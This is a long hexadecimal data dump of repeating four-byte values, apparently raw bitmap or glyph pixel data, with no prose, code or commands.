00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dfdfdfdf30303030000000000000000000000000000000000000000060606060ffffffff0000000000000000000000000000000000000000000000000000000080808080bfbfbfbf0000000000000000000000000000000060606060ffffffffffffffff00000000000000000000000000000000ffffffff505050500000000010101010efefefef30303030000000000000000060606060ffffffff60606060ffffffff0000000000000000000000000000000060606060efefefef10101010000000008f8f8f8f8f8f8f8fffffffffffffffffffffffff6060606000000000ffffffff0000000000000000ffffffff30303030000000009f9f9f9f8f8f8f8f0000000050505050bfbfbfbfffffffff00000000000000000000000000000000ffffffff000000000000000070707070afafafaf0000000040404040dfdfdfdf0000000020202020ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000010101010ffffffff0000000000000000ffffffff0000000000000000ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000010101010ffffffff0000000000000000ffffffff0000000000000000ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000070707070afafafaf0000000040404040cfcfcfcf0000000020202020ffffffffffffffffffffffffffffffff6060606000000000ffffffff0000000000000000ffffffff40404040000000009f9f9f9f8f8f8f8f0000000050505050bfbfbfbf000000000000000060606060ffffffff60606060ffffffff0000000000000000000000000000000060606060efefefef10101010000000008f8f8f8f8f8f8f8f00000000000000000000000060606060ffffffffffffffff00000000000000000000000000000000ffffffff505050500000000010101010efefefef303030300000000000000000000000000000000060606060ffffffff0000000000000000000000000000000000000000000000000000000080808080bfbfbfbf0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dfdfdfdf303030300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffff000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff000000000000000000000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff00000000ffffffff00000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff000000000000000000000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dfdfdfdf30303030000000000000000000000000000000000000000060606060ffffffff0000000000000000000000000000000000000000000000000000000080808080bfbfbfbf0000000000000000000000000000000060606060ffffffffffffffff00000000000000000000000000000000ffffffff505050500000000010101010efefefef30303030000000000000000060606060ffffffff60606060ffffffff0000000000000000000000000000000060606060efefefef10101010000000008f8f8f8f8f8f8f8fffffffffffffffffffffffff6060606000000000ffffffff0000000000000000ffffffff30303030000000009f9f9f9f8f8f8f8f0000000050505050bfbfbfbfffffffff00000000000000000000000000000000ffffffff000000000000000070707070afafafaf0000000040404040dfdfdfdf0000000020202020ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000010101010ffffffff0000000000000000ffffffff0000000000000000ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000010101010ffffffff0000000000000000ffffffff0000000000000000ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000070707070afafafaf0000000040404040cfcfcfcf0000000020202020ffffffffffffffffffffffffffffffff6060606000000000ffffffff0000000000000000ffffffff40404040000000009f9f9f9f8f8f8f8f0000000050505050bfbfbfbf000000000000000060606060ffffffff60606060ffffffff0000000000000000000000000000000060606060efefefef10101010000000008f8f8f8f8f8f8f8f00000000000000000000000060606060ffffffffffffffff00000000000000000000000000000000ffffffff505050500000000010101010efefefef303030300000000000000000000000000000000060606060ffffffff0000000000000000000000000000000000000000000000000000000080808080bfbfbfbf0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dfdfdfdf303030300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffff000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff000000000000000000000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff00000000ffffffff00000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff000000000000000000000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dfdfdfdf30303030000000000000000000000000000000000000000060606060ffffffff0000000000000000000000000000000000000000000000000000000080808080bfbfbfbf0000000000000000000000000000000060606060ffffffffffffffff00000000000000000000000000000000ffffffff505050500000000010101010efefefef30303030000000000000000060606060ffffffff60606060ffffffff0000000000000000000000000000000060606060efefefef10101010000000008f8f8f8f8f8f8f8fffffffffffffffffffffffff6060606000000000ffffffff0000000000000000ffffffff30303030000000009f9f9f9f8f8f8f8f0000000050505050bfbfbfbfffffffff00000000000000000000000000000000ffffffff000000000000000070707070afafafaf0000000040404040dfdfdfdf0000000020202020ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000010101010ffffffff0000000000000000ffffffff0000000000000000ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000010101010ffffffff0000000000000000ffffffff0000000000000000ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000070707070afafafaf0000000040404040cfcfcfcf0000000020202020ffffffffffffffffffffffffffffffff6060606000000000ffffffff0000000000000000ffffffff40404040000000009f9f9f9f8f8f8f8f0000000050505050bfbfbfbf000000000000000060606060ffffffff60606060ffffffff0000000000000000000000000000000060606060efefefef10101010000000008f8f8f8f8f8f8f8f00000000000000000000000060606060ffffffffffffffff00000000000000000000000000000000ffffffff505050500000000010101010efefefef303030300000000000000000000000000000000060606060ffffffff0000000000000000000000000000000000000000000000000000000080808080bfbfbfbf0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dfdfdfdf3030303000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000040404040a0a0a0a0f0f0f0f0ffffffff9f9f9f9f0000000090909090ffffffffffffffffffffffff9090909000000000000000000000000010101010b0b0b0b0f0f0f0f0b8b8b8b8f3f3f3f32f2f2f2f0303030390909090f0f0f0f07070707030303030a6a6a6a6f9f9f9f9909090900000000010101010d0d0d0d0b0b0b0b01f1f1f1ff0f0f0f0404040400000000000000000ffffffff707070700000000060606060ffffffffa6a6a6a6ffffffff00000000b0b0b0b0b0b0b0b00000000060606060d0d0d0d0000000000000000000000000ffffffff3030303060606060ffffffff6060606040404040ffffffff40404040f0f0f0f01010101000000000a0a0a0a070707070000000000000000000000000ffffffff9c9c9c9cffffffff606060600000000070707070ffffffffb8b8b8b8fffffffffffffffffffffffffffffffffffffffffffffffffbfbfbfb0f0f0f0f90909090f9f9f9f9a6a6a6a64040404070707070f0f0f0f090909090e0e0e0e0303030300000000000000000ffffffff101010100000000000000000000000000000000090909090ffffffffffffffffffffffff9090909000000000ffffffff000000000000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000009f9f9f9fffffffff000000000000000000000000ffffffff000000000000000000000000000000000000000000000000efefefef000000000000000000000000ffffffffe0e0e0e0303030300000000000000000ffffffff101010100000000000000000000000000000000010101010ffffffff000000000000000030303030e0e0e0e0b8b8b8b8ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffb8b8b8b840404040f0f0f0f01010101000000000a0a0a0a0707070700000000000000000000000000000000070707070a0a0a0a00000000010101010f0f0f0f04040404000000000b0b0b0b0b0b0b0b00000000060606060d0d0d0d000000000000000000000000000000000d0d0d0d06060606000000000b0b0b0b0b0b0b0b0000000000000000010101010d0d0d0d0b0b0b0b01f1f1f1ff0f0f0f040404040000000000000000040404040f0f0f0f01f1f1f1fb0b0b0b0d0d0d0d01010101000000000000000000000000010101010b0b0b0b0f0f0f0f0b8b8b8b8f3f3f3f33030303030303030f3f3f3f3b8b8b8b8f0f0f0f0b0b0b0b01010101000000000000000000000000000000000000000000000000040404040a0a0a0a0f0f0f0f0fffffffffffffffff0f0f0f0a0a0a0a040404040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dfdfdfdf30303030000000000000000000000000000000000000000060606060ffffffff0000000000000000000000000000000000000000000000000000000080808080bfbfbfbf0000000000000000000000000000000060606060ffffffffffffffff00000000000000000000000000000000ffffffff505050500000000010101010efefefef30303030000000000000000060606060ffffffff60606060ffffffff0000000000000000000000000000000060606060efefefef10101010000000008f8f8f8f8f8f8f8fffffffffffffffffffffffff6060606000000000ffffffff0000000000000000ffffffff30303030000000009f9f9f9f8f8f8f8f0000000050505050bfbfbfbfffffffff00000000000000000000000000000000ffffffff000000000000000070707070afafafaf0000000040404040dfdfdfdf0000000020202020ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000010101010ffffffff0000000000000000ffffffff0000000000000000ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000010101010ffffffff0000000000000000ffffffff0000000000000000ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000070707070afafafaf0000000040404040cfcfcfcf0000000020202020ffffffffffffffffffffffffffffffff6060606000000000ffffffff0000000000000000ffffffff40404040000000009f9f9f9f8f8f8f8f0000000050505050bfbfbfbf000000000000000060606060ffffffff60606060ffffffff0000000000000000000000000000000060606060efefefef10101010000000008f8f8f8f8f8f8f8f00000000000000000000000060606060ffffffffffffffff00000000000000000000000000000000ffffffff505050500000000010101010efefefef303030300000000000000000000000000000000060606060ffffffff0000000000000000000000000000000000000000000000000000000080808080bfbfbfbf0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dfdfdfdf303030300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffff000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff000000000000000000000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff00000000ffffffff00000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff000000000000000000000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dfdfdfdf30303030000000000000000000000000000000000000000060606060ffffffff0000000000000000000000000000000000000000000000000000000080808080bfbfbfbf0000000000000000000000000000000060606060ffffffffffffffff00000000000000000000000000000000ffffffff505050500000000010101010efefefef30303030000000000000000060606060ffffffff60606060ffffffff0000000000000000000000000000000060606060efefefef10101010000000008f8f8f8f8f8f8f8fffffffffffffffffffffffff6060606000000000ffffffff0000000000000000ffffffff30303030000000009f9f9f9f8f8f8f8f0000000050505050bfbfbfbfffffffff00000000000000000000000000000000ffffffff000000000000000070707070afafafaf0000000040404040dfdfdfdf0000000020202020ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000010101010ffffffff0000000000000000ffffffff0000000000000000ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000010101010ffffffff0000000000000000ffffffff0000000000000000ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000070707070afafafaf0000000040404040cfcfcfcf0000000020202020ffffffffffffffffffffffffffffffff6060606000000000ffffffff0000000000000000ffffffff40404040000000009f9f9f9f8f8f8f8f0000000050505050bfbfbfbf000000000000000060606060ffffffff60606060ffffffff0000000000000000000000000000000060606060efefefef10101010000000008f8f8f8f8f8f8f8f00000000000000000000000060606060ffffffffffffffff00000000000000000000000000000000ffffffff505050500000000010101010efefefef303030300000000000000000000000000000000060606060ffffffff0000000000000000000000000000000000000000000000000000000080808080bfbfbfbf0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dfdfdfdf303030300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffff000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff000000000000000000000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff00000000ffffffff00000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff000000000000000000000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dfdfdfdf30303030000000000000000000000000000000000000000060606060ffffffff0000000000000000000000000000000000000000000000000000000080808080bfbfbfbf0000000000000000000000000000000060606060ffffffffffffffff00000000000000000000000000000000ffffffff505050500000000010101010efefefef30303030000000000000000060606060ffffffff60606060ffffffff0000000000000000000000000000000060606060efefefef10101010000000008f8f8f8f8f8f8f8fffffffffffffffffffffffff6060606000000000ffffffff0000000000000000ffffffff30303030000000009f9f9f9f8f8f8f8f0000000050505050bfbfbfbfffffffff00000000000000000000000000000000ffffffff000000000000000070707070afafafaf0000000040404040dfdfdfdf0000000020202020ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000010101010ffffffff0000000000000000ffffffff0000000000000000ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000010101010ffffffff0000000000000000ffffffff0000000000000000ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000070707070afafafaf0000000040404040cfcfcfcf0000000020202020ffffffffffffffffffffffffffffffff6060606000000000ffffffff0000000000000000ffffffff40404040000000009f9f9f9f8f8f8f8f0000000050505050bfbfbfbf000000000000000060606060ffffffff60606060ffffffff0000000000000000000000000000000060606060efefefef10101010000000008f8f8f8f8f8f8f8f00000000000000000000000060606060ffffffffffffffff00000000000000000000000000000000ffffffff505050500000000010101010efefefef303030300000000000000000000000000000000060606060ffffffff0000000000000000000000000000000000000000000000000000000080808080bfbfbfbf0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dfdfdfdf303030300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffff000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff000000000000000000000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff00000000ffffffff00000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff000000000000000000000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dfdfdfdf30303030000000000000000000000000000000000000000060606060ffffffff0000000000000000000000000000000000000000000000000000000080808080bfbfbfbf0000000000000000000000000000000060606060ffffffffffffffff00000000000000000000000000000000ffffffff505050500000000010101010efefefef30303030000000000000000060606060ffffffff60606060ffffffff0000000000000000000000000000000060606060efefefef10101010000000008f8f8f8f8f8f8f8fffffffffffffffffffffffff6060606000000000ffffffff0000000000000000ffffffff30303030000000009f9f9f9f8f8f8f8f0000000050505050bfbfbfbfffffffff00000000000000000000000000000000ffffffff000000000000000070707070afafafaf0000000040404040dfdfdfdf0000000020202020ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000010101010ffffffff0000000000000000ffffffff0000000000000000ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000010101010ffffffff0000000000000000ffffffff0000000000000000ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000070707070afafafaf0000000040404040cfcfcfcf0000000020202020ffffffffffffffffffffffffffffffff6060606000000000ffffffff0000000000000000ffffffff40404040000000009f9f9f9f8f8f8f8f0000000050505050bfbfbfbf000000000000000060606060ffffffff60606060ffffffff0000000000000000000000000000000060606060efefefef10101010000000008f8f8f8f8f8f8f8f00000000000000000000000060606060ffffffffffffffff00000000000000000000000000000000ffffffff505050500000000010101010efefefef303030300000000000000000000000000000000060606060ffffffff0000000000000000000000000000000000000000000000000000000080808080bfbfbfbf0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dfdfdfdf303030300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffff000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffff0000000000000000000000000000000